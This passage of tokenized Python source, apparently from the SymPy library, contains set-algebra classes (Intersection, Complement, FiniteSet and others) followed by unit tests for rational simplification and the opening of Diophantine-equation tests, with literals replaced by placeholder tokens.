( prec ) for set in self . args ) <EOL> except Exception : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> def __iter__ ( self ) : <EOL> import itertools <EOL> def roundrobin ( * iterables ) : <EOL> "<STR_LIT>" <EOL> pending = len ( iterables ) <EOL> if PY3 : <EOL> nexts = itertools . cycle ( iter ( it ) . __next__ for it in iterables ) <EOL> else : <EOL> nexts = itertools . cycle ( iter ( it ) . next for it in iterables ) <EOL> while pending : <EOL> try : <EOL> for next in nexts : <EOL> yield next ( ) <EOL> except StopIteration : <EOL> pending -= <NUM_LIT:1> <EOL> nexts = itertools . cycle ( itertools . islice ( nexts , pending ) ) <EOL> if all ( set . is_iterable for set in self . args ) : <EOL> return roundrobin ( * ( iter ( arg ) for arg in self . args ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> class Intersection ( Set ) : <EOL> """<STR_LIT>""" <EOL> is_Intersection = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> evaluate = kwargs . get ( '<STR_LIT>' , global_evaluate [ <NUM_LIT:0> ] ) <EOL> args = list ( args ) <EOL> def flatten ( arg ) : <EOL> if isinstance ( arg , Set ) : <EOL> if arg . is_Intersection : <EOL> return sum ( map ( flatten , arg . args ) , [ ] ) <EOL> else : <EOL> return [ arg ] <EOL> if iterable ( arg ) : <EOL> return sum ( map ( flatten , arg ) , [ ] ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> args = flatten ( args ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> return S . EmptySet <EOL> if '<STR_LIT>' not in [ type ( a ) . __name__ for a in args ] : <EOL> args = list ( ordered ( args , Set . _infimum_key ) ) <EOL> if evaluate : <EOL> return Intersection . reduce ( args ) <EOL> return Basic . __new__ ( cls , * args ) <EOL> @ property <EOL> def is_iterable ( self ) : <EOL> return any ( arg . is_iterable for arg in self . args ) <EOL> @ property <EOL> def _inf ( self ) : <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def _sup ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def _eval_imageset ( self , f ) : <EOL> return Intersection ( imageset ( f , arg ) for arg in self . args ) <EOL> def _contains ( self , other ) : <EOL> return And ( * [ set . contains ( other ) for set in self . args ] ) <EOL> def __iter__ ( self ) : <EOL> no_iter = True <EOL> for s in self . args : <EOL> if s . is_iterable : <EOL> no_iter = False <EOL> other_sets = set ( self . args ) - set ( ( s , ) ) <EOL> other = Intersection ( other_sets , evaluate = False ) <EOL> for x in s : <EOL> c = sympify ( other . contains ( x ) ) <EOL> if c is S . true : <EOL> yield x <EOL> elif c is S . false : <EOL> pass <EOL> else : <EOL> yield c <EOL> if no_iter : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def _handle_finite_sets ( args ) : <EOL> from sympy . core . logic import fuzzy_and , fuzzy_bool <EOL> from sympy . core . compatibility import zip_longest <EOL> from sympy . utilities . iterables import sift <EOL> sifted = sift ( args , lambda x : x . is_FiniteSet ) <EOL> fs_args = sifted . pop ( True , [ ] ) <EOL> if not fs_args : <EOL> return <EOL> s = fs_args [ <NUM_LIT:0> ] <EOL> fs_args = fs_args [ <NUM_LIT:1> : ] <EOL> other = sifted . pop ( False , [ ] ) <EOL> res = [ ] <EOL> unk = [ ] <EOL> for x in s : <EOL> c = fuzzy_and ( fuzzy_bool ( o . contains ( x ) ) <EOL> for o in fs_args + other ) <EOL> if c : <EOL> res . append ( x ) <EOL> elif c is None : <EOL> unk . append ( x ) <EOL> else : <EOL> pass <EOL> res = FiniteSet ( <EOL> * res , evaluate = False ) if res else S . EmptySet <EOL> if unk : <EOL> symbolic_s_list = [ x for x in s if x . has ( Symbol ) ] <EOL> non_symbolic_s = s - FiniteSet ( <EOL> * symbolic_s_list , evaluate = False ) <EOL> while fs_args : <EOL> v = fs_args . pop ( ) <EOL> if all ( i == j for i , j in zip_longest ( <EOL> symbolic_s_list , <EOL> ( x for x in v if x . has ( Symbol ) ) ) ) : <EOL> for x in non_symbolic_s : <EOL> if x in unk : <EOL> unk . remove ( x ) <EOL> else : <EOL> contained = [ x for x in symbolic_s_list <EOL> if sympify ( v . contains ( x ) ) is S . true ] <EOL> if contained != symbolic_s_list : <EOL> other . append ( <EOL> v - FiniteSet ( <EOL> * contained , evaluate = False ) ) <EOL> else : <EOL> pass <EOL> other_sets = Intersection ( * other ) <EOL> if not other_sets : <EOL> return S . EmptySet <EOL> res += Intersection ( <EOL> FiniteSet ( * unk ) , <EOL> other_sets , evaluate = False ) <EOL> return res <EOL> @ staticmethod <EOL> def reduce ( args ) : <EOL> """<STR_LIT>""" <EOL> from sympy . simplify . simplify import clear_coefficients <EOL> if any ( s . is_EmptySet for s in args ) : <EOL> return S . EmptySet <EOL> rv = Intersection . _handle_finite_sets ( args ) <EOL> if rv is not None : <EOL> if isinstance ( rv , Intersection ) and len ( rv . args ) == <NUM_LIT:2> : <EOL> ivl , s = rv . args <EOL> if isinstance ( s , FiniteSet ) and len ( s ) == <NUM_LIT:1> and isinstance ( ivl , Interval ) : <EOL> e = list ( s ) [ <NUM_LIT:0> ] <EOL> if e . free_symbols : <EOL> rhs = Dummy ( ) <EOL> e , r = clear_coefficients ( e , rhs ) <EOL> if r != rhs : <EOL> iargs = list ( ivl . args ) <EOL> iargs [ <NUM_LIT:0> ] = r . subs ( rhs , ivl . start ) <EOL> iargs [ <NUM_LIT:1> ] = r . subs ( rhs , ivl . end ) <EOL> if iargs [ <NUM_LIT:0> ] > iargs [ <NUM_LIT:1> ] : <EOL> iargs = iargs [ : <NUM_LIT:2> ] [ : : - <NUM_LIT:1> ] + iargs [ - <NUM_LIT:2> : ] [ : : - <NUM_LIT:1> ] <EOL> rv = Intersection ( FiniteSet ( e ) , Interval ( * iargs ) , evaluate = False ) <EOL> return rv <EOL> for s in args : <EOL> if s . is_Union : <EOL> other_sets = set ( args ) - set ( ( s , ) ) <EOL> if len ( other_sets ) > <NUM_LIT:0> : <EOL> other = Intersection ( other_sets ) <EOL> return Union ( Intersection ( arg , other ) for arg in s . args ) <EOL> else : <EOL> return Union ( arg for arg in s . args ) <EOL> for s in args : <EOL> if s . is_Complement : <EOL> args . remove ( s ) <EOL> other_sets = args + [ s . args [ <NUM_LIT:0> ] ] <EOL> return Complement ( Intersection ( * other_sets ) , s . args [ <NUM_LIT:1> ] ) <EOL> args = set ( args ) <EOL> new_args = True <EOL> while ( new_args ) : <EOL> for s in args : <EOL> new_args = False <EOL> for t in args - set ( ( s , ) ) : <EOL> new_set = s . _intersect ( t ) <EOL> if new_set is not None : <EOL> new_args = ( args - set ( ( s , t ) ) ) . union ( set ( ( new_set , ) ) ) <EOL> break <EOL> if new_args : <EOL> args = new_args <EOL> break <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return args . pop ( ) <EOL> else : <EOL> return Intersection ( args , evaluate = False ) <EOL> def as_relational ( self , symbol ) : <EOL> """<STR_LIT>""" <EOL> return And ( * [ set . as_relational ( symbol ) for set in self . args ] ) <EOL> class Complement ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_Complement = True <EOL> def __new__ ( cls , a , b , evaluate = True ) : <EOL> if evaluate : <EOL> return Complement . reduce ( a , b ) <EOL> return Basic . __new__ ( cls , a , b ) <EOL> @ staticmethod <EOL> def reduce ( A , B ) : <EOL> """<STR_LIT>""" <EOL> if B == S . UniversalSet or A . is_subset ( B ) : <EOL> return EmptySet ( ) <EOL> if isinstance ( B , Union ) : <EOL> return Intersection ( s . complement ( A ) for s in B . args ) <EOL> result = B . _complement ( A ) <EOL> if result != None : <EOL> return result <EOL> else : <EOL> return Complement ( A , B , evaluate = False ) <EOL> def _contains ( self , other ) : <EOL> A = self . args [ <NUM_LIT:0> ] <EOL> B = self . args [ <NUM_LIT:1> ] <EOL> return And ( A . contains ( other ) , Not ( B . contains ( other ) ) ) <EOL> class EmptySet ( with_metaclass ( Singleton , Set ) ) : <EOL> """<STR_LIT>""" <EOL> is_EmptySet = True <EOL> is_FiniteSet = True <EOL> def _intersect ( self , other ) : <EOL> return S . EmptySet <EOL> @ property <EOL> def _measure ( self ) : <EOL> return <NUM_LIT:0> <EOL> def _contains ( self , other ) : <EOL> return false <EOL> def as_relational ( self , symbol ) : <EOL> return false <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:0> <EOL> def _union ( self , other ) : <EOL> return other <EOL> def __iter__ ( self ) : <EOL> return iter ( [ ] ) <EOL> def _eval_imageset ( self , f ) : <EOL> return self <EOL> def _eval_powerset ( self ) : <EOL> return FiniteSet ( self ) <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return self <EOL> def _complement ( self , other ) : <EOL> return other <EOL> def _symmetric_difference ( self , other ) : <EOL> return other <EOL> class UniversalSet ( with_metaclass ( Singleton , Set ) ) : <EOL> """<STR_LIT>""" <EOL> is_UniversalSet = True <EOL> def _intersect ( self , other ) : <EOL> return other <EOL> def _complement ( self , other ) : <EOL> return S . EmptySet <EOL> def _symmetric_difference ( self , other ) : <EOL> return other <EOL> @ property <EOL> def _measure ( self ) : <EOL> return S . Infinity <EOL> def _contains ( self , other ) : <EOL> return true <EOL> def as_relational ( self , symbol ) : <EOL> return true <EOL> def _union ( self , other ) : <EOL> return self <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return EmptySet ( ) <EOL> class FiniteSet ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_FiniteSet = True <EOL> is_iterable = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> evaluate = kwargs . get ( '<STR_LIT>' , global_evaluate [ <NUM_LIT:0> ] ) <EOL> if evaluate : <EOL> args = list ( map ( sympify , args ) ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> return EmptySet ( ) <EOL> else : <EOL> args = list ( map ( sympify , args ) ) <EOL> args = list ( ordered ( frozenset ( tuple ( args ) ) , Set . _infimum_key ) ) <EOL> obj = Basic . __new__ ( cls , * args ) <EOL> obj . _elements = frozenset ( args ) <EOL> return obj <EOL> def _eval_Eq ( self , other ) : <EOL> if not other . is_FiniteSet : <EOL> if ( other . is_Union or other . is_Complement or <EOL> other . is_Intersection or other . is_ProductSet ) : <EOL> return <EOL> return false <EOL> if len ( self ) != len ( other ) : <EOL> return false <EOL> return And ( * ( Eq ( x , y ) for x , y in zip ( self . args , other . args ) ) ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . args ) <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , self . __class__ ) : <EOL> return self . __class__ ( * ( self . _elements & other . _elements ) ) <EOL> return self . __class__ ( * [ el for el in self if el in other ] ) <EOL> def _complement ( self , other ) : <EOL> if isinstance ( other , Interval ) : <EOL> nums = sorted ( m for m in self . args if m . is_number ) <EOL> if other == S . Reals and nums != [ ] : <EOL> syms = [ m for m in self . args if m . is_Symbol ] <EOL> intervals = [ ] <EOL> intervals += [ Interval ( S . NegativeInfinity , nums [ <NUM_LIT:0> ] , True , True ) ] <EOL> for a , b in zip ( nums [ : - <NUM_LIT:1> ] , nums [ <NUM_LIT:1> : ] ) : <EOL> intervals . append ( Interval ( a , b , True , True ) ) <EOL> intervals . append ( Interval ( nums [ - <NUM_LIT:1> ] , S . Infinity , True , True ) ) <EOL> if syms != [ ] : <EOL> return Complement ( Union ( intervals , evaluate = False ) , <EOL> FiniteSet ( * syms ) , evaluate = False ) <EOL> else : <EOL> return Union ( intervals , evaluate = False ) <EOL> elif nums == [ ] : <EOL> return None <EOL> elif isinstance ( other , FiniteSet ) : <EOL> unk = [ ] <EOL> for i in self : <EOL> c = sympify ( other . contains ( i ) ) <EOL> if c is not S . true and c is not S . false : <EOL> unk . append ( i ) <EOL> unk = FiniteSet ( * unk ) <EOL> if unk == self : <EOL> return <EOL> not_true = [ ] <EOL> for i in other : <EOL> c = sympify ( self . contains ( i ) ) <EOL> if c is not S . true : <EOL> not_true . append ( i ) <EOL> return Complement ( FiniteSet ( * not_true ) , unk ) <EOL> return Set . _complement ( self , other ) <EOL> def _union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . is_FiniteSet : <EOL> return FiniteSet ( * ( self . _elements | other . _elements ) ) <EOL> if any ( sympify ( other . contains ( x ) ) is S . true for x in self ) : <EOL> return set ( ( <EOL> FiniteSet ( * [ x for x in self <EOL> if other . contains ( x ) != True ] ) , other ) ) <EOL> return None <EOL> def _contains ( self , other ) : <EOL> """<STR_LIT>""" <EOL> r = false <EOL> for e in self . _elements : <EOL> t = Eq ( e , other , evaluate = True ) <EOL> if isinstance ( t , Eq ) : <EOL> t = t . simplify ( ) <EOL> if t == true : <EOL> return t <EOL> elif t != false : <EOL> r = None <EOL> return r <EOL> def _eval_imageset ( self , f ) : <EOL> return FiniteSet ( * map ( f , self ) ) <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return self <EOL> @ property <EOL> def _inf ( self ) : <EOL> from sympy . functions . elementary . miscellaneous import Min <EOL> return Min ( * self ) <EOL> @ property <EOL> def _sup ( self ) : <EOL> from sympy . functions . elementary . miscellaneous import Max <EOL> return Max ( * self ) <EOL> @ property <EOL> def measure ( self ) : <EOL> return <NUM_LIT:0> <EOL> def __len__ ( self ) : <EOL> return len ( self . args ) <EOL> def as_relational ( self , symbol ) : <EOL> """<STR_LIT>""" <EOL> from sympy . core . relational import Eq <EOL> return Or ( * [ Eq ( symbol , elem ) for elem in self ] ) <EOL> def compare ( self , other ) : <EOL> return ( hash ( self ) - hash ( other ) ) <EOL> def _eval_evalf ( self , prec ) : <EOL> return FiniteSet ( * [ elem . _eval_evalf ( prec ) for elem in self ] ) <EOL> def _hashable_content ( self ) : <EOL> return ( self . _elements , ) <EOL> @ property <EOL> def _sorted_args ( self ) : <EOL> return tuple ( ordered ( self . args , Set . _infimum_key ) ) <EOL> def _eval_powerset ( self ) : <EOL> return self . func ( * [ self . func ( * s ) for s in subsets ( self . args ) ] ) <EOL> def __ge__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return other . is_subset ( self ) <EOL> def __gt__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return self . is_proper_superset ( other ) <EOL> def __le__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return self . is_subset ( other ) <EOL> def __lt__ ( self , other ) : <EOL> if not isinstance ( other , Set ) : <EOL> raise TypeError ( "<STR_LIT>" % func_name ( other ) ) <EOL> return self . is_proper_subset ( other ) <EOL> converter [ set ] = lambda x : FiniteSet ( * x ) <EOL> converter [ frozenset ] = lambda x : FiniteSet ( * x ) <EOL> class SymmetricDifference ( Set ) : <EOL> """<STR_LIT>""" <EOL> is_SymmetricDifference = True <EOL> def __new__ ( cls , a , b , evaluate = True ) : <EOL> if evaluate : <EOL> return SymmetricDifference . reduce ( a , b ) <EOL> return Basic . __new__ ( cls , a , b ) <EOL> @ staticmethod <EOL> def reduce ( A , B ) : <EOL> result = B . _symmetric_difference ( A ) <EOL> if result is not None : <EOL> return result <EOL> else : <EOL> return SymmetricDifference ( A , B , evaluate = False ) <EOL> def imageset ( * args ) : <EOL> r"""<STR_LIT>""" <EOL> from sympy . core import Lambda <EOL> from sympy . sets . fancysets import ImageSet <EOL> from sympy . geometry . util import _uniquely_named_symbol <EOL> if len ( args ) not in ( <NUM_LIT:2> , <NUM_LIT:3> ) : <EOL> raise ValueError ( '<STR_LIT>' % len ( args ) ) <EOL> set = args [ - <NUM_LIT:1> ] <EOL> if not isinstance ( set , Set ) : <EOL> name = func_name ( set ) <EOL> raise ValueError ( <EOL> '<STR_LIT>' % name ) <EOL> if len ( args ) == <NUM_LIT:3> : <EOL> f = Lambda ( * args [ : <NUM_LIT:2> ] ) <EOL> elif len ( args ) == <NUM_LIT:2> : <EOL> f = args [ <NUM_LIT:0> ] <EOL> if isinstance ( f , Lambda ) : <EOL> pass <EOL> elif ( <EOL> isinstance ( f , FunctionClass ) <EOL> or func_name ( f ) == '<STR_LIT>' <EOL> ) : <EOL> var = _uniquely_named_symbol ( Symbol ( '<STR_LIT:x>' ) , f ( Dummy ( ) ) ) <EOL> expr = f ( var ) <EOL> f = Lambda ( var , expr ) <EOL> else : <EOL> raise TypeError ( filldedent ( '''<STR_LIT>''' % <EOL> func_name ( f ) ) ) <EOL> r = set . _eval_imageset ( f ) <EOL> if isinstance ( r , ImageSet ) : <EOL> f , set = r . args <EOL> if f . variables [ <NUM_LIT:0> ] == f . expr : <EOL> return set <EOL> if isinstance ( set , ImageSet ) : <EOL> if len ( set . lamda . variables ) == <NUM_LIT:1> and len ( f . variables ) == <NUM_LIT:1> : <EOL> return imageset ( Lambda ( set . lamda . variables [ <NUM_LIT:0> ] , <EOL> f . expr . subs ( f . variables [ <NUM_LIT:0> ] , set . lamda . expr ) ) , <EOL> set . base_set ) <EOL> if r is not None : <EOL> return r <EOL> return ImageSet ( f , set ) </s>
<s> from sympy import ratsimpmodprime , ratsimp , Rational , sqrt , pi , log , erf <EOL> from sympy . abc import x , y , z , t , a , b , c , d , e , f , g , h , i , k <EOL> def test_ratsimp ( ) : <EOL> f , g = <NUM_LIT:1> / x + <NUM_LIT:1> / y , ( x + y ) / ( x * y ) <EOL> assert f != g and ratsimp ( f ) == g <EOL> f , g = <NUM_LIT:1> / ( <NUM_LIT:1> + <NUM_LIT:1> / x ) , <NUM_LIT:1> - <NUM_LIT:1> / ( x + <NUM_LIT:1> ) <EOL> assert f != g and ratsimp ( f ) == g <EOL> f , g = x / ( x + y ) + y / ( x + y ) , <NUM_LIT:1> <EOL> assert f != g and ratsimp ( f ) == g <EOL> f , g = - x - y - y ** <NUM_LIT:2> / ( x + y ) + x ** <NUM_LIT:2> / ( x + y ) , - <NUM_LIT:2> * y <EOL> assert f != g and ratsimp ( f ) == g <EOL> f = ( a * c * x * y + a * c * z - b * d * x * y - b * d * z - b * t * x * y - b * t * x - b * t * z + <EOL> e * x ) / ( x * y + z ) <EOL> G = [ a * c - b * d - b * t + ( - b * t * x + e * x ) / ( x * y + z ) , <EOL> a * c - b * d - b * t - ( b * t * x - e * x ) / ( x * y + z ) ] <EOL> assert f != g and ratsimp ( f ) in G <EOL> A = sqrt ( pi ) <EOL> B = log ( erf ( x ) - <NUM_LIT:1> ) <EOL> C = log ( erf ( x ) + <NUM_LIT:1> ) <EOL> D = <NUM_LIT:8> - <NUM_LIT:8> * erf ( x ) <EOL> f = A * B / D - A * C / D + A * C * erf ( x ) / D - A * B * erf ( x ) / D + <NUM_LIT:2> * A / D <EOL> assert ratsimp ( f ) == A * B / <NUM_LIT:8> - A * C / <NUM_LIT:8> - A / ( <NUM_LIT:4> * erf ( x ) - <NUM_LIT:4> ) <EOL> def test_ratsimpmodprime ( ) : <EOL> a = y ** <NUM_LIT:5> + x + y <EOL> b = x - y <EOL> F = [ x * y ** <NUM_LIT:5> - x - y ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == ( x ** <NUM_LIT:2> + x * y + x + y ) / ( x ** <NUM_LIT:2> - x * y ) <EOL> a = x + y ** <NUM_LIT:2> - <NUM_LIT:2> <EOL> b = x + y ** <NUM_LIT:2> - y - <NUM_LIT:1> <EOL> F = [ x * y - <NUM_LIT:1> ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == ( <NUM_LIT:1> + y - x ) / ( y - x ) <EOL> a = <NUM_LIT:5> * x ** <NUM_LIT:3> + <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:4> * x * y + <NUM_LIT> * x + <NUM_LIT:12> * y + <NUM_LIT:15> <EOL> b = <NUM_LIT:7> * x ** <NUM_LIT:3> - y * x ** <NUM_LIT:2> + <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:2> * x * y + <NUM_LIT:15> * y + <NUM_LIT> * x + <NUM_LIT> <EOL> F = [ x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - <NUM_LIT:1> ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == ( <NUM_LIT:1> + <NUM_LIT:5> * y - <NUM_LIT:5> * x ) / ( <NUM_LIT:8> * y - <NUM_LIT:6> * x ) <EOL> a = x * y - x - <NUM_LIT:2> * y + <NUM_LIT:4> <EOL> b = x + y ** <NUM_LIT:2> - <NUM_LIT:2> * y <EOL> F = [ x - <NUM_LIT:2> , y - <NUM_LIT:3> ] <EOL> assert ratsimpmodprime ( a / b , F , x , y , order = '<STR_LIT>' ) == Rational ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> assert ratsimpmodprime ( x , [ y - <NUM_LIT:2> * x ] , order = '<STR_LIT>' ) == y / <NUM_LIT:2> </s>
<s> from sympy import ( Add , factor_list , igcd , Matrix , Mul , S , simplify , <EOL> Symbol , symbols , Eq , pi , factorint , oo , powsimp ) <EOL> from sympy . core . function import _mexpand <EOL> from sympy . core . compatibility import range <EOL> from sympy . functions . elementary . trigonometric import sin <EOL> from sympy . solvers . diophantine import ( descent , diop_bf_DN , diop_DN , <EOL> diop_solve , diophantine , divisible , equivalent , find_DN , ldescent , length , <EOL> reconstruct , partition , power_representation , <EOL> prime_as_sum_of_two_squares , square_factor , sum_of_four_squares , <EOL> sum_of_three_squares , transformation_to_DN , transformation_to_normal , <EOL> classify_diop , base_solution_linear , cornacchia , sqf_normal , <EOL> diop_ternary_quadratic_normal , _diop_ternary_quadratic_normal , <EOL> gaussian_reduce , holzer , diop_general_pythagorean , <EOL> _diop_general_sum_of_squares , _nint_or_floor , _odd , _even , <EOL> _remove_gcd , check_param , parametrize_ternary_quadratic , <EOL> diop_ternary_quadratic , diop_linear , diop_quadratic , <EOL> diop_general_sum_of_squares , sum_of_powers , sum_of_squares , <EOL> diop_general_sum_of_even_powers , _can_do_sum_of_squares ) <EOL> from sympy . utilities import default_sort_key <EOL> from sympy . utilities . pytest import slow , raises , XFAIL <EOL> a , b , c , d , p , q , x , y , z , w , t , u , v , X , Y , Z = symbols ( <EOL> "<STR_LIT>" , integer = True ) <EOL> t_0 , t_1 , t_2 , t_3 , t_4 , t_5 , t_6 = symbols ( "<STR_LIT>" , integer = True ) <EOL> m1 , m2 , m3 = symbols ( '<STR_LIT>' , integer = True ) <EOL> n1 = symbols ( '<STR_LIT>' , integer = True ) <EOL> def diop_simplify ( eq ) : <EOL> return _mexpand ( powsimp ( _mexpand ( eq ) ) ) <EOL> def test_input_format ( ) : <EOL> raises ( TypeError , lambda : diophantine ( sin ( x ) ) ) <EOL> raises ( TypeError , lambda : diophantine ( <NUM_LIT:3> ) ) <EOL> raises ( TypeError , lambda : diophantine ( x / pi - <NUM_LIT:3> ) ) <EOL> def test_univariate ( ) : <EOL> assert diop_solve ( ( x - <NUM_LIT:1> ) * ( x - <NUM_LIT:2> ) ** <NUM_LIT:2> ) == set ( [ ( <NUM_LIT:1> , ) , ( <NUM_LIT:2> , ) ] ) <EOL> assert diop_solve ( ( x - <NUM_LIT:1> ) * ( x - <NUM_LIT:2> ) ) == set ( [ ( <NUM_LIT:1> , ) , ( <NUM_LIT:2> , ) ] ) <EOL> def test_classify_diop ( ) : <EOL> raises ( TypeError , lambda : classify_diop ( x ** <NUM_LIT:2> / <NUM_LIT:3> - <NUM_LIT:1> ) ) <EOL> raises ( ValueError , lambda : classify_diop ( <NUM_LIT:1> ) ) <EOL> raises ( NotImplementedError , lambda : classify_diop ( w * x * y * z - <NUM_LIT:1> ) ) <EOL> assert classify_diop ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:15> * x - <NUM_LIT> ) == ( <EOL> [ x ] , { <NUM_LIT:1> : - <NUM_LIT> , x : <NUM_LIT:15> , x ** <NUM_LIT:2> : <NUM_LIT> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z ) == ( <EOL> [ x , y , z ] , { x * y : <NUM_LIT:1> , z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z + w + x ** <NUM_LIT:2> ) == ( <EOL> [ w , x , y , z ] , { x * y : <NUM_LIT:1> , w : <NUM_LIT:1> , x ** <NUM_LIT:2> : <NUM_LIT:1> , z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + x * z + x ** <NUM_LIT:2> + <NUM_LIT:1> ) == ( <EOL> [ x , y , z ] , { x * y : <NUM_LIT:1> , x * z : <NUM_LIT:1> , x ** <NUM_LIT:2> : <NUM_LIT:1> , <NUM_LIT:1> : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z + w + <NUM_LIT> ) == ( <EOL> [ w , x , y , z ] , { x * y : <NUM_LIT:1> , w : <NUM_LIT:1> , <NUM_LIT:1> : <NUM_LIT> , z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y + z * w ) == ( <EOL> [ w , x , y , z ] , { x * y : <NUM_LIT:1> , w * z : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> assert classify_diop ( x * y ** <NUM_LIT:2> + <NUM_LIT:1> ) == ( <EOL> [ x , y ] , { x * y ** <NUM_LIT:2> : <NUM_LIT:1> , <NUM_LIT:1> : <NUM_LIT:1> } , '<STR_LIT>' ) <EOL> def test_linear ( ) : <EOL> assert diop_solve ( x ) == ( <NUM_LIT:0> , ) <EOL> assert diop_solve ( <NUM_LIT:1> * x ) == ( <NUM_LIT:0> , ) <EOL> assert diop_solve ( <NUM_LIT:3> * x ) == ( <NUM_LIT:0> , ) <EOL> assert diop_solve ( x + <NUM_LIT:1> ) == ( - <NUM_LIT:1> , ) <EOL> assert diop_solve ( <NUM_LIT:2> * x + <NUM_LIT:1> ) == ( None , ) <EOL> assert diop_solve ( <NUM_LIT:2> * x + <NUM_LIT:4> ) == ( - <NUM_LIT:2> , ) <EOL> assert diop_solve ( y + x ) == ( t_0 , - t_0 ) <EOL> assert diop_solve ( y + x + <NUM_LIT:0> ) == ( t_0 , - t_0 ) <EOL> assert diop_solve ( y + x - <NUM_LIT:0> ) == ( t_0 , - t_0 ) <EOL> assert diop_solve ( <NUM_LIT:0> * x - y - <NUM_LIT:5> ) == ( - <NUM_LIT:5> , ) <EOL> assert diop_solve ( <NUM_LIT:3> * y + <NUM_LIT:2> * x - <NUM_LIT:5> ) == ( <NUM_LIT:3> * t_0 - <NUM_LIT:5> , - <NUM_LIT:2> * t_0 + <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:2> * x - <NUM_LIT:3> * y - <NUM_LIT:5> ) == ( <NUM_LIT:3> * t_0 - <NUM_LIT:5> , <NUM_LIT:2> * t_0 - <NUM_LIT:5> ) <EOL> assert diop_solve ( - <NUM_LIT:2> * x - <NUM_LIT:3> * y - <NUM_LIT:5> ) == ( <NUM_LIT:3> * t_0 + <NUM_LIT:5> , - <NUM_LIT:2> * t_0 - <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:7> * x + <NUM_LIT:5> * y ) == ( <NUM_LIT:5> * t_0 , - <NUM_LIT:7> * t_0 ) <EOL> assert diop_solve ( <NUM_LIT:2> * x + <NUM_LIT:4> * y ) == ( <NUM_LIT:2> * t_0 , - t_0 ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:6> * y - <NUM_LIT:4> ) == ( <NUM_LIT:3> * t_0 - <NUM_LIT:2> , - <NUM_LIT:2> * t_0 + <NUM_LIT:2> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:6> * y - <NUM_LIT:3> ) == ( None , None ) <EOL> assert diop_solve ( <NUM_LIT:0> * x + <NUM_LIT:3> * y - <NUM_LIT:4> * z + <NUM_LIT:5> ) == ( <NUM_LIT:4> * t_0 + <NUM_LIT:5> , <NUM_LIT:3> * t_0 + <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:3> * y - <NUM_LIT:4> * z + <NUM_LIT:5> ) == ( t_0 , <NUM_LIT:8> * t_0 + <NUM_LIT:4> * t_1 + <NUM_LIT:5> , <NUM_LIT:7> * t_0 + <NUM_LIT:3> * t_1 + <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:3> * y - <NUM_LIT:4> * z + <NUM_LIT:5> , None ) == ( <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> assert diop_solve ( <NUM_LIT:4> * x + <NUM_LIT:2> * y + <NUM_LIT:8> * z - <NUM_LIT:5> ) == ( None , None , None ) <EOL> assert diop_solve ( <NUM_LIT:5> * x + <NUM_LIT:7> * y - <NUM_LIT:2> * z - <NUM_LIT:6> ) == ( t_0 , - <NUM_LIT:3> * t_0 + <NUM_LIT:2> * t_1 + <NUM_LIT:6> , - <NUM_LIT:8> * t_0 + <NUM_LIT:7> * t_1 + <NUM_LIT> ) <EOL> assert diop_solve ( <NUM_LIT:3> * x - <NUM_LIT:6> * y + <NUM_LIT:12> * z - <NUM_LIT:9> ) == ( <NUM_LIT:2> * t_0 + <NUM_LIT:3> , t_0 + <NUM_LIT:2> * t_1 , t_1 ) <EOL> assert diop_solve ( <NUM_LIT:6> * w + <NUM_LIT:9> * x + <NUM_LIT:20> * y - z ) == ( t_0 , t_1 , t_1 + t_2 , <NUM_LIT:6> * t_0 + <NUM_LIT> * t_1 + <NUM_LIT:20> * t_2 ) <EOL> raises ( TypeError , lambda : diop_solve ( x / <NUM_LIT:2> ) ) <EOL> def test_quadratic_simple_hyperbolic_case ( ) : <EOL> assert 